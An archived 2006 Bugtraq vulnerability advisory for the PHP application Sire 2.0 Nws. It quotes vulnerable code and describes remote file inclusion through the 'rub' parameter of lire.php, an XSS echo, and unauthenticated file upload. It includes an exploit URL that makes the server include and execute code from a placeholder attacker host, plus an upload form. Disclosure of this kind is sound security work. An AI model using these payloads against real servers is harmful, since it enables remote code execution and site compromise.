lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 7 Apr 2006 23:48:52 -0000
From: simo64@...il.com
To: bugtraq@...urityfocus.com
Subject: Sire 2.0 Nws Remote File inclusion & Arbitary Files Upload




by Moroccan Security Team Geetz To All Freind

[+]File Inclusion:
	Input passed to the "rub" parameter in "lire.php" isn't properly verified,
	before it is used to include remote files
	Successful exploitation requires that "register_globals" is enabled.
[lire.php code]
<?
	73		if(empty($_GET["rub"])){$rub=rtrim($rubriques[0]);} else {$rub=$_GET["rub"];}
	75		include($rub."/compter.php"); ## File Inclusion !!
	
	298		echo $rub; ## XSS
?>

[+]Exploit: Exploit http://[trajet]/lire.php?rub=http://[attacker]&cahier=1&art=1
[+]http://[attacker]/compter.php Will be Included And Executed withe the privilege of the webserver

File Upload 
Remote User can Upload jpg,jpeg,gif,bmp files without Identification ,
[upload.php code:]
<?
if( isset($_POST['upload']) ) // si formulaire soumis
{
#Upload code ....
}
?>
Exploit :

<form enctype="multipart/form-data" method="post" action="http://Trajet/upload.php?">
Download File<br>
<input name="fichier" type="file" size="48"><br>
<input type="submit" name="upload" value="uploader"><form>

[Moroccan Security Team]

contact:
simo64[at]gmail[dot]com


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ